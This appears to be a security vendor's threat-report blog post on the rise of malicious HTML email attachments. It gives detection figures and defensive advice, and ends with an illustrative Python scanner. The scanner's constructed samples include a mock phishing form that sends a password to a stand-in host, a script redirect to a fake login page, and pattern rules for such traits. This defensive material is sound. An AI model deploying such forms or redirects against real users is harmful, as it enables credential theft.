Threat spotlight: Malicious HTML attachments double

Barracuda Networks

By Fleming Shi, Chief Technology Officer, Barracuda Networks
Monday, 15 May, 2023



The security industry has been highlighting the cybercriminal misuse of HTML (Hypertext Markup Language) for years — and evidence suggests it remains a successful and popular attack tool. Last year we reported that around one in five (21%) of all HTML attachments scanned by Barracuda in May 2022 were malicious. Ten months on, that figure has more than doubled — 45.7% of scanned HTML files were found to be malicious in March 2023.

Malicious HTML detections by month.

The legitimate use of HTML

HTML is used to create and structure content that is displayed online. HTML is also commonly used in email communication — for example, in automated reports that users might be receiving on a regular basis, such as newsletters, marketing materials and more. In many cases, reports are attached to an email in HTML format (with the file extension .html, .htm or .xhtml, for example).

If the communication appears to come from a known or trusted brand, the recipient is unlikely to be suspicious.

The malicious use of HTML 

However, attackers can successfully leverage HTML as an attack technique, using well-crafted messages, compromised websites and malicious HTML file attachments to trick users. Attackers use this approach to conceal malicious intent such as phishing, credential theft and more.

If a recipient opens the HTML file, multiple redirects via JavaScript libraries hosted elsewhere will take them to a phishing site or other malicious content controlled by the attackers. Users are then asked to enter their credentials to access information or download a file that may contain malware.

However, in some cases seen by Barracuda researchers, the HTML file itself includes sophisticated malware with the complete malicious payload embedded within it, including potent scripts and executables. This attack technique is becoming more widely used than those involving externally hosted JavaScript files.

Protection against malicious HTML-based attacks should take into account the entire email carrying HTML attachments, looking at all redirects and analysing the content of the email for malicious intent. More on that below.

Recent examples of malicious HTML attachments are often similar to those seen in the past, in that they mirror common logins — such as Microsoft. Their continued and widespread use in attacks suggests attackers remain successful in trapping victims.

Proportion of unique attacks

If you compare the total number of malicious HTML detections to how many different (unique) files were detected, it becomes clear that the growing volume of malicious files detected is not simply the result of a limited number of mass attacks, but the result of many different attacks each using specially crafted files.

For example, daily detection data for the three months from January to March 2023 reveals two significant attack peaks, on 7 March and 23 March. 

On 7 March, there were 672,145 malicious HTML artifacts detected in total, comprising 181,176 different items. This means that around a quarter (27%) of the detected files were unique and the rest were repeat or mass deployments of those files.

However, on 23 March, almost nine in ten (405,438 — 85%) of the total 475,938 malicious HTML artifacts were unique — which means that almost every single attack was different.

HTML attachments continue to dominate the list of file types used for malicious purposes

Barracuda analysis further shows that the overall volume of malicious HTML attachments is not only increasing but that, nearly a year on from our last report, HTML attachments remain the file type most likely to be used for malicious purposes.

Artifacts by type in March 2023.

When it comes to attack tactics and tools, the fact that something has been around for a while doesn’t appear to make it any less potent. Malicious HTML is still being used by attackers because it works. Getting the right security in place is as important now as it has ever been, if not more so.

How to protect against malicious HTML attachments

  • Email protection — It is essential to have effective email protection in place and ensure that your security scanning can identify and block malicious HTML attachments. Because these are not always easy to identify for the reasons above, the best solutions will include machine learning and static code analysis that will evaluate the content of an email and not just an attachment.
  • User education and awareness — Train people to spot and report potentially malicious HTML attachments. Given the volume and diversity of these types of attacks, it’s probably good to be wary of all HTML attachments, especially those coming from sources they haven’t seen before. Remind people not to share their login credentials with anyone, ever.
  • Robust authentication and access controls — Multifactor authentication (MFA) remains a good access control, but attackers are increasingly turning to advanced social engineering techniques, such as MFA fatigue, to bypass many types of MFA protection. Consider turning to Zero Trust Access measures to enhance security. An effective Zero Trust solution such as Barracuda CloudGen Access dynamically monitors multiple parameters — user, device, location, time, resources being accessed and more — which makes it much more difficult for attackers to compromise your network using stolen credentials.
  • If a malicious HTML file does get through — Make sure you have post-delivery remediation tools to quickly identify and remove malicious emails from all user inboxes. An automated incident response can help to do this before the attack spreads through an organisation. In addition, account takeover protection can monitor and alert you to any suspicious account activity if login credentials were to be compromised.
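As an added illustration of the static code analysis mentioned under “Email protection” (example code, not Barracuda’s own scanner), the following Python checks an HTML attachment for the traits described in this article: JavaScript hosted elsewhere that redirects the reader, credential-harvesting forms, and a self-contained encoded payload. The sample attachments, host names and score weights are constructed for the example.

```python
import base64
import re
from html.parser import HTMLParser

# Heuristics for the traits described above: JS redirects, long encoded blobs, inline script bodies.
REDIRECT_RE = re.compile(r"(?:window\.|document\.)?location(?:\.href|\.replace)?\s*[=(]", re.I)
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)

class TagCollector(HTMLParser):
    """Counts externally hosted scripts, password inputs and meta-refresh redirects."""
    def __init__(self):
        super().__init__()
        self.external_scripts, self.password_fields, self.meta_refresh = [], 0, 0

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").lower() for k, v in attrs}
        if tag == "script" and a.get("src", "").startswith(("http://", "https://", "//")):
            self.external_scripts.append(a["src"])      # JavaScript hosted elsewhere
        elif tag == "input" and a.get("type") == "password":
            self.password_fields += 1                   # credential-harvesting form
        elif tag == "meta" and a.get("http-equiv") == "refresh":
            self.meta_refresh += 1                      # HTML-level redirect

def inspect_html(doc):
    """Return the indicators found in one attachment plus a weighted score and verdict."""
    tags = TagCollector()
    tags.feed(doc)
    script = "\n".join(SCRIPT_RE.findall(doc))
    ind = {
        "external_scripts": len(tags.external_scripts),
        "js_redirects": len(REDIRECT_RE.findall(script)) + tags.meta_refresh,
        "password_fields": tags.password_fields,
        "embedded_payload": bool(BASE64_RE.search(doc)) or "atob(" in script,
    }
    score = 2 * (ind["external_scripts"] + ind["js_redirects"] + ind["password_fields"]) + 3 * ind["embedded_payload"]
    ind["score"] = score
    ind["verdict"] = "block" if score >= 4 else "review" if score >= 2 else "allow"
    return ind

# Constructed samples (hypothetical hosts, not real malware) mimicking the traits described above.
SAMPLES = {
    "report.html": "<html><body><h1>Monthly report</h1><p>All systems nominal.</p></body></html>",
    "invoice.html": ('<html><head><script src="https://cdn.example-hypothetical.test/l.js"></script></head>'
                     '<body><script>window.location.href = "https://login.example-hypothetical.test/";</script></body></html>'),
    "voicemail.html": ('<html><body><form action="https://collect.example-hypothetical.test/p" method="post">'
                       '<input type="password" name="pwd"></form><script>document.write(atob("'
                       + base64.b64encode(b"<h2>Sign in to continue</h2>" * 10).decode() + '"));</script></body></html>'),
}
```

In a mail gateway this check would run alongside analysis of the carrying message and its redirect chain, as the article recommends, rather than on the attachment alone.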

Fleming Shi is Chief Technology Officer at Barracuda, where he leads the company’s threat research and innovation engineering teams in building future technology platforms. He has more than 20 patents granted or pending in network and content security.

Image credit: iStock.com/photovibes
